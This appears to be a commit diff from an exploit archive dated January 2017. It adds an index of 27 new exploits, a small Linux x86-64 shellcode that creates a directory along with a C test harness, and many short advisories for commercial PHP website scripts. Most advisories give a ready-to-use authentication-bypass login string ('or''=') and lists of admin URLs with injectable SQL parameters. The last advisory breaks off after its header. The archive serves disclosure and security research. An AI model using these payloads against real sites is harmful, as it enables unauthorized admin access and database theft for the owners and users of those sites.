DB: 2017-01-19

27 new exploits

SentryHD 02.01.12e - Privilege Escalation

Linux/x86-64 - mkdir Shellcode (25 bytes)

ownrs blog beta3 - SQL Injection / Cross-Site Scripting
OwnRS blog beta3 - SQL Injection / Cross-Site Scripting

Dodo's Quiz Script 1.1 - (dodosquiz.php) Local File Inclusion
Dodo's Quiz Script 1.1 - Local File Inclusion

Mambo Component SOBI2 RC 2.8.2 - (bid) SQL Injection
Mambo Component SOBI2 RC 2.8.2 - SQL Injection

Joomla! Component com_pcchess - (game_id) Blind SQL Injection
Joomla! Component com_pcchess - Blind SQL Injection
Medical Clinic Website Script - SQL Injection
Fileserve Clone Script - Authentication Bypass
Auction Website Script - SQL Injection
Wetransfer Clone Script - Authentication Bypass
Finance Website Script - SQL Injection
Justdial Clone Script - Authentication Bypass
Business Directory Script - SQL Injection
Buy and Sell Market Place Software - SQL Injection
Dentist Website Script - SQL Injection
Manufacturer Website Design Script - SQL Injection
Micro Blog Script - SQL Injection
My Private Tutor Website Builder Script - SQL Injection
NGO Directory Script - SQL Injection
Yoga and Fitness Website Script - SQL Injection
NGO Website Script - SQL Injection
Questions and Answers Script 1.1.3 - SQL Injection
Online Mobile Recharge Script - SQL Injection
Clone of Oddee Script 1.1.3 - SQL Injection
Online Printing Business Clone Script - SQL Injection
Online Tshirt Design Script - SQL Injection
Shiksha Educational Website Script - SQL Injection
Study Abroad Educational Website Script - SQL Injection
Courier Management System - SQL Injection
Flippa Website Script - SQL Injection
B2B Script 4.27 - SQL Injection

files.csv

@@ -8756,6 +8756,7 @@ id,file,description,date,author,platform,type,port
 41021,platforms/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,multiple,local,0
 41022,platforms/linux/local/41022.txt,"Firejail - Privilege Escalation",2017-01-09,"Daniel Hodson",linux,local,0
 41076,platforms/linux/local/41076.py,"iSelect v1.4 - Local Buffer Overflow",2017-01-16,"Juan Sacco",linux,local,0
+41090,platforms/windows/local/41090.py,"SentryHD 02.01.12e - Privilege Escalation",2017-01-18,"Kacper Szurek",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15828,6 +15829,7 @@ id,file,description,date,author,platform,type,port
 40924,platforms/lin_x86/shellcode/40924.c,"Linux/x86 - /bin/bash -c Arbitrary Command Execution Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",lin_x86,shellcode,0
 40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Password Protected Bind Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
 41072,platforms/win_x86-64/shellcode/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
+41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -19034,7 +19036,7 @@ id,file,description,date,author,platform,type,port
 5857,platforms/php/webapps/5857.txt,"Carscripts Classifieds - 'cat' Parameter SQL Injection",2008-06-18,Stack,php,webapps,0
 5858,platforms/php/webapps/5858.txt,"BoatScripts Classifieds - 'type' Parameter SQL Injection",2008-06-18,Stack,php,webapps,0
 5859,platforms/php/webapps/5859.txt,"eLineStudio Site Composer (ESC) 2.6 - Multiple Vulnerabilities",2008-06-19,BugReport.IR,php,webapps,0
-5860,platforms/php/webapps/5860.txt,"ownrs blog beta3 - SQL Injection / Cross-Site Scripting",2008-06-19,"CWH Underground",php,webapps,0
+5860,platforms/php/webapps/5860.txt,"OwnRS blog beta3 - SQL Injection / Cross-Site Scripting",2008-06-19,"CWH Underground",php,webapps,0
 5861,platforms/php/webapps/5861.txt,"Yektaweb Academic Web Tools CMS 1.4.2.8 - Multiple Vulnerabilities",2008-06-19,BugReport.IR,php,webapps,0
 5862,platforms/php/webapps/5862.txt,"samart-cms 2.0 - 'contentsid' Parameter SQL Injection",2008-06-19,dun,php,webapps,0
 5863,platforms/php/webapps/5863.txt,"CMS-BRD - 'menuclick' Parameter SQL Injection",2008-06-19,dun,php,webapps,0
@@ -20545,11 +20547,11 @@ id,file,description,date,author,platform,type,port
 7835,platforms/php/webapps/7835.htm,"Max.Blog 1.0.6 - Arbitrary Delete Post Exploit",2009-01-20,SirGod,php,webapps,0
 7836,platforms/php/webapps/7836.txt,"AJ Auction Pro OOPD 2.3 - 'id' Parameter SQL Injection",2009-01-20,snakespc,php,webapps,0
 7837,platforms/php/webapps/7837.pl,"LinPHA Photo Gallery 2.0 - Remote Command Execution",2009-01-20,Osirys,php,webapps,0
-7838,platforms/php/webapps/7838.txt,"Dodo's Quiz Script 1.1 - (dodosquiz.php) Local File Inclusion",2009-01-20,Stack,php,webapps,0
+7838,platforms/php/webapps/7838.txt,"Dodo's Quiz Script 1.1 - Local File Inclusion",2009-01-20,Stack,php,webapps,0
 7840,platforms/php/webapps/7840.pl,"Joomla! Component Com BazaarBuilder Shopping Cart 5.0 - SQL Injection",2009-01-21,XaDoS,php,webapps,0
-7841,platforms/php/webapps/7841.txt,"Mambo Component SOBI2 RC 2.8.2 - (bid) SQL Injection",2009-01-21,"Br1ght D@rk",php,webapps,0
+7841,platforms/php/webapps/7841.txt,"Mambo Component SOBI2 RC 2.8.2 - SQL Injection",2009-01-21,"Br1ght D@rk",php,webapps,0
 7844,platforms/php/webapps/7844.py,"Sad Raven's Click Counter 1.0 - passwd.dat Disclosure",2009-01-21,Pouya_Server,php,webapps,0
-7846,platforms/php/webapps/7846.php,"Joomla! Component com_pcchess - (game_id) Blind SQL Injection",2009-01-21,InjEctOr5,php,webapps,0
+7846,platforms/php/webapps/7846.php,"Joomla! Component com_pcchess - Blind SQL Injection",2009-01-21,InjEctOr5,php,webapps,0
 7847,platforms/php/webapps/7847.txt,"Joomla! Component beamospetition 1.0.12 - SQL Injection / Cross-Site Scripting",2009-01-21,vds_s,php,webapps,0
 7849,platforms/php/webapps/7849.txt,"OwnRS Blog 1.2 - (autor.php) SQL Injection",2009-01-22,nuclear,php,webapps,0
 7850,platforms/asp/webapps/7850.txt,"asp-project 1.0 - Insecure Cookie Method",2009-01-22,"Khashayar Fereidani",asp,webapps,0
@@ -37023,3 +37025,28 @@ id,file,description,date,author,platform,type,port
 41084,platforms/php/webapps/41084.txt,"BoZoN 2.4 - Remote Code Execution",2017-01-17,hyp3rlinx,php,webapps,0
 41086,platforms/aspx/webapps/41086.txt,"Check Box 2016 Q2 Survey - Multiple Vulnerabilities",2017-01-17,"Fady Mohammed Osman",aspx,webapps,0
 41087,platforms/php/webapps/41087.txt,"Openexpert 0.5.17 - SQL Injection",2017-01-17,"Nassim Asrir",php,webapps,0
+41091,platforms/php/webapps/41091.txt,"Medical Clinic Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
+41092,platforms/php/webapps/41092.txt,"Fileserve Clone Script - Authentication Bypass",2017-01-18,"Ihsan Sencan",php,webapps,0
+41093,platforms/php/webapps/41093.txt,"Auction Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
+41094,platforms/php/webapps/41094.txt,"Wetransfer Clone Script - Authentication Bypass",2017-01-18,"Ihsan Sencan",php,webapps,0
+41095,platforms/php/webapps/41095.txt,"Finance Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
+41096,platforms/php/webapps/41096.txt,"Justdial Clone Script - Authentication Bypass",2017-01-18,"Ihsan Sencan",php,webapps,0
+41097,platforms/php/webapps/41097.txt,"Business Directory Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
+41098,platforms/php/webapps/41098.txt,"Buy and Sell Market Place Software - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
+41099,platforms/php/webapps/41099.txt,"Dentist Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
+41100,platforms/php/webapps/41100.txt,"Manufacturer Website Design Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
+41101,platforms/php/webapps/41101.txt,"Micro Blog Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
+41102,platforms/php/webapps/41102.txt,"My Private Tutor Website Builder Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
+41103,platforms/php/webapps/41103.txt,"NGO Directory Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
+41104,platforms/php/webapps/41104.txt,"Yoga and Fitness Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
+41105,platforms/php/webapps/41105.txt,"NGO Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
+41106,platforms/php/webapps/41106.txt,"Questions and Answers Script 1.1.3 - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
+41107,platforms/php/webapps/41107.txt,"Online Mobile Recharge Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
+41108,platforms/php/webapps/41108.txt,"Clone of Oddee Script 1.1.3 - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
+41109,platforms/php/webapps/41109.txt,"Online Printing Business Clone Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
+41110,platforms/php/webapps/41110.txt,"Online Tshirt Design Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
+41111,platforms/php/webapps/41111.txt,"Shiksha Educational Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
+41112,platforms/php/webapps/41112.txt,"Study Abroad Educational Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
+41113,platforms/php/webapps/41113.txt,"Courier Management System - SQL Injection",2017-01-17,"Sibusiso Sishi",php,webapps,0
+41114,platforms/php/webapps/41114.txt,"Flippa Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
+41116,platforms/php/webapps/41116.txt,"B2B Script 4.27 - SQL Injection",2017-01-18,"Dawid Morawski",php,webapps,0

platforms/lin_x86-64/shellcode/41089.c

@@ -0,0 +1,47 @@
+/*
+---------------------------------------------------------------------------------------------------
+ 
+Linux/x86_x64 - mkdir("ajit", 755) - 25 bytes
+ 
+Ajith Kp          [ http://fb.com/ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
+Vishnu Nath Kp    [ http://www.terminalcoders.blogspot.com ]
+Sayooj S Nambiar  [ http://fb.com/sayooj.sivadas ]
+ 
+Om Asato Maa Sad-Gamaya |
+Tamaso Maa Jyotir-Gamaya |
+Mrtyor-Maa Amrtam Gamaya |
+Om Shaantih Shaantih Shaantih |
+ 
+---------------------------------------------------------------------------------------------------
+Disassembly of section .text:
+
+0000000000400080 <.text>:
+  400080: 48 31 f6              xor    %rsi,%rsi
+  400083: 56                    push   %rsi
+  400084: 68 61 6a 69 74        pushq  $0x74696a61
+  400089: 54                    push   %rsp
+  40008a: 5f                    pop    %rdi
+  40008b: 6a 53                 pushq  $0x53
+  40008d: 58                    pop    %rax
+  40008e: 66 be ef 01           mov    $0x1ef,%si
+  400092: 0f 05                 syscall 
+  400094: 6a 3c                 pushq  $0x3c
+  400096: 58                    pop    %rax
+  400097: 0f 05                 syscall
+---------------------------------------------------------------------------------------------------
+ 
+How To Run
+ 
+$ gcc -o mkdir_shellcode_linux_x64 mkdir_shellcode_linux_x64.c -z execstack
+$ ./mkdir_shellcode_linux_x64
+ 
+---------------------------------------------------------------------------------------------------
+*/
+#include <stdio.h>
+char sh[]="\x48\x31\xf6\x56\x68\x61\x6a\x69\x74\x54\x5f\x6a\x53\x58\x66\xbe\xef\x01\x0f\x05\x6a\x3c\x58\x0f\x05";
+void main(int argc, char **argv)
+{
+    int (*func)();
+    func = (int (*)()) sh;
+    (int)(*func)();
+}

platforms/php/webapps/41091.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Vulnerability: SQL Injection + Authentication Bypass
+# Date: 18.01.2017
+# Vendor Homepage: http://www.scriptgiant.com/
+# Script Name: Medical Clinic Website Script
+# Script Buy Now: http://www.popularclones.com/products/Medical-Clinic-Website
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# Authentication Bypass :
+# http://localhost/[PATH]/admin_giant/ and set Username:'or''=' and Password to 'or''=' and hit enter.
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/admin_giant/add_gallery.php?id=[SQL]
+# http://localhost/[PATH]/admin_giant/add_team_member.php?id=[SQL]
+# E.t.c.... Other files, too. SQL There are security vulnerabilities.
+# # # # #

platforms/php/webapps/41092.txt

@@ -0,0 +1,13 @@
+# # # # # 
+# Vulnerability: SQL Injection + Authentication Bypass
+# Date: 18.01.2017
+# Vendor Homepage: http://www.scriptgiant.com/
+# Script Name: Fileserve Clone Script
+# Script Buy Now: http://www.scriptgiant.com/software/32/fileserve-script
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
+# SQL Injection There are security vulnerabilities.
+# # # # #

platforms/php/webapps/41093.txt

@@ -0,0 +1,14 @@
+# # # # # 
+# Vulnerability: SQL Injection
+# Date: 18.01.2017
+# Vendor Homepage: http://www.scriptgiant.com/
+# Script Name: Auction Website Script
+# Script Buy Now: http://www.popularclones.com/products/Auction-Website-Script
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/news.dtl.php?id=[SQL]
+# E.t.c.... Other files, too. SQL There are security vulnerabilities.
+# # # # # 

platforms/php/webapps/41094.txt

@@ -0,0 +1,13 @@
+# # # # # 
+# Vulnerability: SQL Injection + Authentication Bypass
+# Date: 18.01.2017
+# Vendor Homepage: http://www.scriptgiant.com/
+# Script Name: Wetransfer Clone Script
+# Script Buy Now: http://www.popularclones.com/products/File-Transfer-Script
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
+# SQL Injection There are security vulnerabilities.
+# # # # #

platforms/php/webapps/41095.txt

@@ -0,0 +1,14 @@
+# # # # # 
+# Vulnerability: SQL Injection
+# Date: 18.01.2017
+# Vendor Homepage: http://www.scriptgiant.com/
+# Script Name: Finance Website Script
+# Script Buy Now: http://www.popularclones.com/products/Finance-Website-Script
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/user.profile.php?uid=[SQL]
+# E.t.c.... Other files, too. SQL There are security vulnerabilities.
+# # # # # 

platforms/php/webapps/41096.txt

@@ -0,0 +1,13 @@
+# # # # # 
+# Vulnerability: SQL Injection + Authentication Bypass
+# Date: 18.01.2017
+# Vendor Homepage: http://www.scriptgiant.com/
+# Script Name: Justdial Clone Script
+# Script Buy Now: http://www.popularclones.com/products/Justdial-Directory
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
+# SQL Injection There are security vulnerabilities.
+# # # # #

platforms/php/webapps/41097.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Vulnerability: SQL Injection + Authentication Bypass
+# Date: 18.01.2017
+# Vendor Homepage: http://www.scriptgiant.com/
+# Script Name: Business Directory Script
+# Script Buy Now: http://www.popularclones.com/products/Business-Directory-Script
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# Authentication Bypass :
+# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/admin/edit_member.php?status=Y&id=[SQL]
+# http://localhost/[PATH]/admin/edit_review.php?id=[SQL]
+# E.t.c.... Other files, too. SQL There are security vulnerabilities.
+# # # # #

platforms/php/webapps/41098.txt

@@ -0,0 +1,16 @@
+# # # # # 
+# Vulnerability: SQL Injection + Authentication Bypass
+# Date: 18.01.2017
+# Vendor Homepage: http://www.scriptgiant.com/
+# Script Name: Buy and Sell Market Place Software
+# Script Buy Now: http://www.popularclones.com/products/Buy-and-Sell-Market-Place-Software
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Authentication Bypass :
+# http://localhost/[PATH]/admin_giant/ and set Username:'or''=' and Password to 'or''=' and hit enter.
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/admin_giant/page.editor.php?id=[SQL]
+# E.t.c.... Other files, too. SQL There are security vulnerabilities.
+# # # # #

platforms/php/webapps/41099.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Vulnerability: SQL Injection + Authentication Bypass
+# Date: 18.01.2017
+# Vendor Homepage: http://www.scriptgiant.com/
+# Script Name: Dentist Website Script
+# Script Buy Now: http://www.popularclones.com/products/Dentist-Website-Script
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Authentication Bypass :
+# http://localhost/[PATH]/admin_giant/ and set Username:'or''=' and Password to 'or''=' and hit enter.
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/admin_giant/add_gallery.php?id=[SQL]
+# http://localhost/[PATH]/admin_giant/client.entry.php?id=[SQL]
+# E.t.c.... Other files, too. SQL There are security vulnerabilities.
+# # # # #

platforms/php/webapps/41100.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Vulnerability: SQL Injection + Authentication Bypass
+# Date: 18.01.2017
+# Vendor Homepage: http://www.scriptgiant.com/
+# Script Name: Manufacturer Website Design Script
+# Script Buy Now: http://www.popularclones.com/products/Manufacturer-Website
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Authentication Bypass :
+# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/admin/add_gallery.php?id=[SQL]
+# http://localhost/[PATH]/admin/add_product.php?prod_id=[SQL]
+# E.t.c.... Other files, too. SQL There are security vulnerabilities.
+# # # # #

platforms/php/webapps/41101.txt

@@ -0,0 +1,20 @@
+# # # # # 
+# Vulnerability: SQL Injection + Authentication Bypass
+# Date: 18.01.2017
+# Vendor Homepage: http://www.scriptgiant.com/
+# Tested on: http://www.microblogscript.scriptgiant.in
+# Script Name: Micro Blog Script
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Authentication Bypass :
+# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/backoffice/security.php?act=edit_cat&id=[SQL]
+# http://localhost/[PATH]/backoffice/blog_category.php?act=edit_cat&blog_category_id=[SQL]
+# http://localhost/[PATH]/backoffice/photo.php?act=edit_cat&photo_id=[SQL]
+# http://localhost/[PATH]/backoffice/video.php?act=edit_cat&video_id=[SQL]
+# http://localhost/[PATH]/backoffice/banner_list.php?act=edit_cat&banner_id=[SQL]
+# E.t.c.... Other files, too. SQL There are security vulnerabilities.
+# # # # #

platforms/php/webapps/41102.txt

@@ -0,0 +1,20 @@
+# # # # # 
+# Vulnerability: SQL Injection + Authentication Bypass
+# Date: 18.01.2017
+# Vendor Homepage: http://www.scriptgiant.com/
+# Script Name: My Private Tutor Website Builder Script
+# Script Buy Now: http://www.popularclones.com/products/My-Private-Tutor-Website-Builder
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Authentication Bypass :
+# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/admin/page.editor.php?id=[SQL]
+# http://localhost/[PATH]/admin/add_cat.php?id=[SQL]
+# http://localhost/[PATH]/admin/add_subcat.php?id=[SQL]
+# http://localhost/[PATH]/find_group_class.php?cat_id=[SQL]
+# http://localhost/[PATH]/join_class.php?course_id=[SQL]
+# E.t.c.... Other files, too. SQL There are security vulnerabilities.
+# # # # #

platforms/php/webapps/41103.txt

@@ -0,0 +1,22 @@
+# # # # # 
+# Vulnerability: SQL Injection + Authentication Bypass
+# Date: 18.01.2017
+# Vendor Homepage: http://www.scriptgiant.com/
+# Script Name: NGO Directory Script
+# Script Buy Now: http://www.popularclones.com/products/NGO-Directory-Script
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Authentication Bypass :
+# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/admin/add_country.php?countryid=[SQL]
+# http://localhost/[PATH]/admin/states_add.php?state_id=[SQL]
+# http://localhost/[PATH]/admin/cities_add.php?cityid=[SQL]
+# http://localhost/[PATH]/admin/request_add.php?request_id=[SQL]
+# http://localhost/[PATH]/admin/good_category_add.php?goods_cat_id=[SQL]
+# http://localhost/[PATH]/details_religios.html?project_id=[SQL]
+# http://localhost/[PATH]/details.html?project_id=[SQL]
+# E.t.c.... Other files, too. SQL There are security vulnerabilities.
+# # # # #

platforms/php/webapps/41104.txt

@@ -0,0 +1,16 @@
+# # # # # 
+# Vulnerability: SQL Injection
+# Date: 18.01.2017
+# Vendor Homepage: http://www.scriptgiant.com/
+# Script Name: Yoga and Fitness Website Script
+# Script Buy Now: http://www.popularclones.com/products/Yoga-and-Fitness-Website
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/promo_classes.php?cid=[SQL]
+# http://localhost/[PATH]/style.php?s=[SQL]
+# http://localhost/[PATH]/teacherindi.php?t=[SQL]
+# E.t.c.... Other files, too. SQL There are security vulnerabilities.
+# # # # #

platforms/php/webapps/41105.txt

@@ -0,0 +1,21 @@
+# # # # # 
+# Vulnerability: SQL Injection + Authentication Bypass
+# Date: 18.01.2017
+# Vendor Homepage: http://www.scriptgiant.com/
+# Script Name: NGO Website Script
+# Script Buy Now: http://www.popularclones.com/products/NGO-Website-Script
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Authentication Bypass :
+# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/admin/addnew.event.php?id=[SQL]
+# http://localhost/[PATH]/admin/add_new_photo.php?id=[SQL]
+# http://localhost/[PATH]/admin/add_new_project.php?id=[SQL]
+# http://localhost/[PATH]/admin/add_new_video.php?id=[SQL]
+# http://localhost/[PATH]/admin/addnew.activity.php?id=[SQL]
+# http://localhost/[PATH]/admin/addblog.php?id=[SQL]
+# E.t.c.... Other files, too. SQL There are security vulnerabilities.
+# # # # #

platforms/php/webapps/41106.txt

@@ -0,0 +1,15 @@
+# # # # # 
+# Vulnerability: SQL Injection
+# Date: 15.01.2017
+# Vendor Homepage: http://www.scriptfolder.com/
+# Script Name: Questions and Answers Script V1.1.3
+# Script Buy Now: http://www.scriptfolder.com/questions-and-answers/
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/question.php?id=[SQL]
+# http://localhost/[PATH]/category.php?id=[SQL]
+# E.t.c.... 
+# # # # # 

platforms/php/webapps/41107.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Vulnerability: SQL Injection + Authentication Bypass
+# Date: 18.01.2017
+# Vendor Homepage: http://www.scriptgiant.com/
+# Script Name: Online Mobile Recharge
+# Script Buy Now: http://www.popularclones.com/products/Online-Mobile-Recharge
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Authentication Bypass :
+# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/admin/user_edit.php?id=[SQL]
+# http://localhost/[PATH]/admin/page.editor.php?id=[SQL]
+# E.t.c.... Other files, too. SQL There are security vulnerabilities.
+# # # # #

platforms/php/webapps/41108.txt

@@ -0,0 +1,14 @@
+# # # # # 
+# Vulnerability: SQL Injection
+# Date: 15.01.2017
+# Vendor Homepage: http://www.scriptfolder.com/
+# Script Name: Questions and Answers Script V1.1.3
+# Script Buy Now: http://www.scriptfolder.com/cool-planet-clone-of-oddee/
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search.php?term=[SQL]
+# E.t.c.... 
+# # # # # 

platforms/php/webapps/41109.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Vulnerability: SQL Injection + Authentication Bypass
+# Date: 18.01.2017
+# Vendor Homepage: http://www.scriptgiant.com/
+# Script Name: Online Printing Business Clone Script
+# Script Buy Now: http://www.popularclones.com/products/Online-Print-Business
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Authentication Bypass :
+# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/product-decs.php?cat_id=[SQL]
+# http://localhost/[PATH]/admin/product.entryform.php?product_id=[SQL]
+# E.t.c.... Other files, too. SQL There are security vulnerabilities.
+# # # # #

platforms/php/webapps/41110.txt

@@ -0,0 +1,16 @@
+# # # # # 
+# Vulnerability: SQL Injection + Authentication Bypass
+# Date: 18.01.2017
+# Vendor Homepage: http://www.scriptgiant.com/
+# Script Name: Online Tshirt Design Script
+# Script Buy Now: http://www.popularclones.com/products/Online-Tshirt-Designer
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Authentication Bypass :
+# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/admin/product.new.add.php?id=[SQL]
+# E.t.c.... Other files, too. SQL There are security vulnerabilities.
+# # # # #

platforms/php/webapps/41111.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Vulnerability: SQL Injection + Authentication Bypass
+# Date: 18.01.2017
+# Vendor Homepage: http://www.scriptgiant.com/
+# Script Name: Shiksha Educational Website Script
+# Script Buy Now: http://www.popularclones.com/products/Shiksha-Educational
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Authentication Bypass :
+# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/admin/member.regform.php?user_id=[SQL]
+# http://localhost/[PATH]/admin/subject_add.php?id=[SQL]
+# E.t.c.... Other files, too. SQL There are security vulnerabilities.
+# # # # #

platforms/php/webapps/41112.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Vulnerability: SQL Injection + Authentication Bypass
+# Date: 18.01.2017
+# Vendor Homepage: http://www.scriptgiant.com/
+# Script Name: Study Abroad Educational Website Script
+# Script Buy Now: http://www.popularclones.com/products/Study-Abroad-Educational-Website
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Authentication Bypass :
+# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/admin/list_blogs.php?mpid=[SQL]
+# http://localhost/[PATH]/admin/list_listing.php?mpid=[SQL]
+# E.t.c.... Other files, too. SQL There are security vulnerabilities.
+# # # # #

platforms/php/webapps/41113.txt

@@ -0,0 +1,67 @@
+# Title : Courier Management System - Sql Injection and non-persistent XSS login portal
+# Date: 17 January 2017
+# Exploit Author: Sibusiso Sishi sibusiso@ironsky.co.za
+# Tested on: Windows7 x32
+# Vendor: http://couriermanageme.sourceforge.net/
+# Version: not supplied
+# Download Software: https://sourceforge.net/projects/couriermanageme/files/
+ 
+#################################################
+
+## About The Product : ##
